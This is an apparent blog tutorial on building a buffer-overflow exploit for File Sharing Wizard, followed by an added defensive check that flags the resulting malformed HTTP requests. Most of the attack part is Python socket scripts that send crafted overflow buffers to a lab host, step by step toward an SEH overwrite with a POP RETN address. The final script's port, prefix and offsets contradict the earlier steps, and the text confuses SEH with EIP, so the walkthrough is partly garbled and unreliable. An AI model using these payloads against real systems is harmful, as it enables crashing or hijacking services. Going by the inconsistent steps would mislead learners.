
Wednesday, February 22, 2012

Exploiting File Sharing Wizard

This time, the application we will fuzz is File Sharing Wizard.
First start File Sharing Wizard and make sure it is running, then attach OllyDbg to the File Sharing Wizard process.
Once OllyDbg is attached to File Sharing Wizard, run the following fuzzer:

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 80

# Request that starts with "http://" followed by 80000 filler bytes
buffer = b"http://"
buffer += b"A" * 80000
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()




As the script above shows, the fuzzer sends a buffer of 80000 bytes to File Sharing Wizard. Notice what happens in the application's memory.


The next step is to find out how many bytes it takes to overwrite the SEH address. The tool used is pattern_create.rb.

After that, copy the pattern_create output into the fuzzer created earlier:

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 80

buffer = b"http://"
buffer += b""  # paste the pattern_create.rb output here
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Run the modified fuzzer and watch OllyDbg.

Then use pattern_offset to find out at how many bytes EIP is overwritten.



Next, still using the same fuzzer, change the buffer value to 1040 bytes to check whether the calculation is correct:

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 80

buffer = b"http://"
buffer += b"\x90" * 1040                    # filler up to the calculated offset
buffer += b"\xCC\xCC\xCC\xCC"               # marker bytes
buffer += b"\x41\x41\x41\x41"               # marker bytes
buffer += b"\x90" * (80004 - len(buffer))   # pad to the original length
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()

Run the fuzzer again and look at the result in OllyDbg.





Now enter the address of the POP RETN into the fuzzer:

#!/usr/bin/python
import socket

target_address = "192.168.56.101"
target_port = 6660

buffer = b"USV"
buffer += b"\x90" * 962
buffer += b"\xCC\xCC\xCC\xCC"
buffer += b"\xFF\x25\xF7\x7D"               # POP RETN address
buffer += b"\x90" * (2504 - len(buffer))
buffer += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
sock.close()
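
Seen from the receiving side, the requests built by the scripts above are easy to tell apart from real HTTP traffic: an over-long first line, no "METHOD target HTTP/x.y" structure, long runs of one repeated byte and non-printable bytes. The check below is an added example, not part of the original post; the function name inspect_request, the two limits and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumed limits for this sketch; tune them to the service being protected.
MAX_REQUEST_LINE = 8192   # bytes allowed before the first CRLF
MAX_BYTE_RUN = 256        # longest tolerated run of one repeated byte

# One byte followed by at least MAX_BYTE_RUN copies of itself.
_RUN = re.compile(rb"(.)\1{%d,}" % MAX_BYTE_RUN, re.DOTALL)

def inspect_request(raw):
    """Return the reasons why the raw bytes of a request look hostile."""
    reasons = []
    line, sep, _ = raw.partition(b"\r\n")
    if not sep:
        reasons.append("no CRLF terminator")
    if len(line) > MAX_REQUEST_LINE:
        reasons.append("request line of %d bytes exceeds %d"
                       % (len(line), MAX_REQUEST_LINE))
    parts = line.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        reasons.append("not 'METHOD target HTTP/x.y'")
    if any(b < 0x20 or b > 0x7E for b in bytearray(line)):
        reasons.append("non-printable bytes in request line")
    match = _RUN.search(line)
    if match:
        reasons.append("run of byte 0x%02x longer than %d"
                       % (ord(match.group(1)), MAX_BYTE_RUN))
    return reasons

# Constructed samples: one ordinary request and two with the shape of the
# fuzzer payloads shown on this page.
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "long_a": b"http://" + b"A" * 80000 + b"\r\n\r\n",
    "nop_fill": b"http://" + b"\x90" * 1040 + b"\xcc" * 4
                + b"\x41" * 4 + b"\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw) or "clean")
```

Rejecting a request as soon as any reason is returned, before the bytes reach the application's own parser, keeps input like this out of the code path that crashed in the debugger.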



 
 
